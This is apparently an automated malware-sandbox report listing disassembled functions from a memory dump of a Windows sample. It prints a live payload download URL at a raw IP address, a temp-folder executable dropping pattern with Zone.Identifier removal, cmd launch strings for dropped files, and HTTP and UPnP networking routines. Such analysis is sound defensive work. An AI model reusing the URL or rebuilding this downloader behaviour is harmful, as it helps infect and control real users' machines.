Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe
API String ID: 2816847299-853099633
Opcode ID: db0eaae3e853224ad670cce8e70ecd23fd08653b657d015a3b33c3440649b795
Instruction ID: 1fb007f132407df9fd1c0735e7405706d6c761cf3eec079010f6fac199ffc060
Opcode Fuzzy Hash: db0eaae3e853224ad670cce8e70ecd23fd08653b657d015a3b33c3440649b795
Instruction Fuzzy Hash: 524194B4A41318BBD7209B60DC4DFDA7774AB48701F1085E5F60AB61D1DABD6AC0CF28

Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0040192C
WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
accept.WS2_32(?,?,?), ref: 004019A8
GetTickCount.KERNEL32 ref: 004019F6
EnterCriticalSection.KERNEL32(?), ref: 00401A09
LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
GetTickCount.KERNEL32 ref: 00401A43
EnterCriticalSection.KERNEL32(?), ref: 00401A52
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
GetTickCount.KERNEL32 ref: 00401AAB
WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB

Strings

ilci, xrefs: 004019E1
PCOI, xrefs: 0040198A

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
String ID: PCOI$ilci
API String ID: 3345448188-3762367603
Opcode ID: 5def7e071e7da6894acac3e8c9e4b3eb82f64dc1225d37b855f6bd456c2498ea
Instruction ID: 80b39a6ab1993389b90647d5cb6895440bceaa9a0d1ea8ab9cba8154187b69d5
Opcode Fuzzy Hash: 5def7e071e7da6894acac3e8c9e4b3eb82f64dc1225d37b855f6bd456c2498ea
Instruction Fuzzy Hash: A7411771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF855A72E1DB78E985CB99

Function 0040EF70 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0040EF98
InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
InternetCloseHandle.WININET(00000000), ref: 0040F181
InternetCloseHandle.WININET(00000000), ref: 0040F18E
InternetCloseHandle.WININET(00000000), ref: 0040F19B

Strings

Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x), xrefs: 0040EFF6
POST, xrefs: 0040F05E
<, xrefs: 0040EFA0

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
API String ID: 2761394606-2217117414
Opcode ID: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
Instruction ID: ef1808732392904e9289ee89b59ca4b2c464bfe5f798c53c6f33b23f739279b9
Opcode Fuzzy Hash: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
Instruction Fuzzy Hash: 40510AB5A01228ABDB36CF54DC54BDA73BCAB48705F1081E9B50DAA280D7B96FC4CF54

Function 00401600 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
InterlockedDecrement.KERNEL32(?), ref: 0040164B
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
InterlockedIncrement.KERNEL32(?), ref: 00401691
InterlockedDecrement.KERNEL32(?), ref: 004016A1
LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
WSACloseEvent.WS2_32(?), ref: 00401715
DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B

Strings

ilci, xrefs: 00401630
PCOI, xrefs: 0040160D

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
String ID: PCOI$ilci
API String ID: 2403999931-3762367603
Opcode ID: 3405ee1fcabb9421b3ec30595840ce6cebe584c34456a6c61e452a9706b0566e
Instruction ID: 00719830d96ac068de130eecfd85e1b44ef6fd60ec2c55820453df0d9b8f54e2
Opcode Fuzzy Hash: 3405ee1fcabb9421b3ec30595840ce6cebe584c34456a6c61e452a9706b0566e
Instruction Fuzzy Hash: B731A671900705ABC710AF70EC48B97B7B8BF09300F048A2AE569A7691D779F894CB98

Function 0040E640 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130networkfileCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0040E668
InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
memcpy.NTDLL(00000000,?,00000000), ref: 0040E7FA
InternetCloseHandle.WININET(00000000), ref: 0040E837
InternetCloseHandle.WININET(00000000), ref: 0040E844
InternetCloseHandle.WININET(00000000), ref: 0040E851

Strings

GET, xrefs: 0040E72B
<, xrefs: 0040E670

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
String ID: <$GET
API String ID: 1205665004-427699995
Opcode ID: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
Instruction ID: bd69c55cfb2b9f93b8bf7ceaaaaaf86fc3309545456039a657a23fe3286800e0
Opcode Fuzzy Hash: 74e573df251a3fdd9775996cb884078f57aebd0a6693bdda84868dee8850155f
Instruction Fuzzy Hash: F75109B1A41228ABDB36DB50CC55BE973BCAB44705F0484E9E60DAA2C0D7B96BC4CF54

Function 00406660 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 106comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040666B
CoCreateInstance.OLE32(00413030,00000000,00000001,00413010,00000008), ref: 00406683
wsprintfW.USER32 ref: 004066C4
wsprintfW.USER32 ref: 004066E5

Strings

/c start %s & start %s\rvlcfg.exe, xrefs: 004066D9
cl@, xrefs: 004066A0
/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe, xrefs: 004066B8
%comspec%, xrefs: 004066EE

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: wsprintf$CreateInitializeInstance
String ID: %comspec%$/c start %s & start %s\rvlcfg.exe$/c start %s & start %s\rvldrv.exe & start %s\rvlcfg.exe$cl@
API String ID: 1147330536-497122036
Opcode ID: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
Instruction ID: e126a915917d584c7bd6e3cca15df18ca7e9be12ab45cc4692bb8e15b90f0fb7
Opcode Fuzzy Hash: eee1a2fc8572b98f6c40a5fc3c9db374d26e8a3e47ee9b9990b59bb952fb1ff2
Instruction Fuzzy Hash: 67411D75A40208AFC704DF98C885FDEB7B5AF88704F208199F515A72A5C675AE81CB54

Function 00401D60 Relevance: 13.6, APIs: 9, Instructions: 141COMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,00000000), ref: 00401D86
InterlockedDecrement.KERNEL32(?), ref: 00401DB0
InterlockedDecrement.KERNEL32(?), ref: 00401DC3
InterlockedExchangeAdd.KERNEL32(?,?), ref: 00401DD4
InterlockedDecrement.KERNEL32(?), ref: 00401E5B
InterlockedDecrement.KERNEL32(?), ref: 00401EF6
setsockopt.WS2_32 ref: 00401F2C
closesocket.WS2_32(?), ref: 00401F39

Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
String ID:
API String ID: 671207744-0
Opcode ID: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
Instruction ID: f2cbb4ded8662be063e38a6044f3a63d93470e371ff4fbf655dea468244fd3f8
Opcode Fuzzy Hash: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
Instruction Fuzzy Hash: 4F51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96

Function 0040ECC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
SysFreeString.OLEAUT32(00000000), ref: 0040EDF7

Strings

deviceType, xrefs: 0040ED86
device, xrefs: 0040ED73

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
Instruction ID: 03739fb7cbf0ac8b4f24cf275543a684364e3b5b0ef8f18e7a9da7a5ef98527e
Opcode Fuzzy Hash: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
Instruction Fuzzy Hash: 1A413A75A0020ADFCB04DF99D884BAFB7B5FF48304F108969E505A7390D778AA91CB95

Function 0040EB60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
SysFreeString.OLEAUT32(00000000), ref: 0040EC97

Strings

serviceType, xrefs: 0040EC26
service, xrefs: 0040EC13

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
Instruction ID: 010777473a756836e58c8d4bedbd534eac8e5d19c37eb4cb5fbe46cee8795b1d
Opcode Fuzzy Hash: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
Instruction Fuzzy Hash: 9F416A74A0020ADFDB04CF99C884BAFB7B9BF48304F108969E505B7390D779AE81CB95

Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 94c249e045a06f1e2524c37c45e205f07dc7f45f180538b1808bcfe672da9775
Instruction ID: a453b5b0d0ea6fd4c501cc83d62b7a74cd48d0bc9ee55fa6e36116878b1ddbe7
Opcode Fuzzy Hash: 94c249e045a06f1e2524c37c45e205f07dc7f45f180538b1808bcfe672da9775
Instruction Fuzzy Hash: D231D1722012059BC710AFB5ED8CAE7B7A8FB44314F04863EE55AD3280DB78A4449BA9

Function 0040ED01 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
SysFreeString.OLEAUT32(00000000), ref: 0040EDF7

Strings

deviceType, xrefs: 0040ED86
device, xrefs: 0040ED73

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: device$deviceType
API String ID: 1602765415-3511266565
Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95

Function 0040EBA1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
SysFreeString.OLEAUT32(00000000), ref: 0040EC97

Strings

serviceType, xrefs: 0040EC26
service, xrefs: 0040EC13

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: FreeStringlstrcmpi
String ID: service$serviceType
API String ID: 1602765415-3667235276
Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95

Function 00409860 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 0040986D
_aullshr.NTDLL ref: 0040987E
_allshl.NTDLL ref: 004098A0
_aullshr.NTDLL ref: 004098BC
_allshl.NTDLL ref: 004098DE
_aullshr.NTDLL ref: 004098FA

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: _allshl_aullshr
String ID:
API String ID: 673498613-0
Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8

Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
InterlockedDecrement.KERNEL32(?), ref: 004018B1

Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
String ID:
API String ID: 3966618661-0
Opcode ID: fa77988927cb930059e1e0cbc8a5de5e4af0f9e1d52da1810f0081e508491bbd
Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
Opcode Fuzzy Hash: fa77988927cb930059e1e0cbc8a5de5e4af0f9e1d52da1810f0081e508491bbd
Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99

Function 00409440 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

_allshl.NTDLL ref: 0040944E
_allshl.NTDLL ref: 0040945D
_allshl.NTDLL ref: 0040946C
_allshl.NTDLL ref: 0040947B
_allshl.NTDLL ref: 0040948A

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: _allshl
String ID:
API String ID: 435966717-0
Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1

Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401346
WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401352
CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 0040135C

Part of subcall function 0040AB60: RtlFreeHeap.NTDLL(02D90000,00000000,00402612,?,00402612,?), ref: 0040ABBB

Strings

pdu, xrefs: 00401339

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CloseEventFreeHandleHeapObjectSingleWait
String ID: pdu
API String ID: 309973729-2320407122
Opcode ID: d53d7859b80e41eb9fd1776689c76fead4092fa41b0b9c03735f9e49e291d2c8
Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
Opcode Fuzzy Hash: d53d7859b80e41eb9fd1776689c76fead4092fa41b0b9c03735f9e49e291d2c8
Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9

Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON

Download Yara Rule

APIs

GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
WSAGetLastError.WS2_32 ref: 00401FB9
GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
String ID:
API String ID: 2074799992-0
Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA

Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
WSAGetLastError.WS2_32(?,?,?,00401FD3,00000000), ref: 00401C90
Sleep.KERNEL32(00000001,?,?,?,00401FD3,00000000), ref: 00401CA6
WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

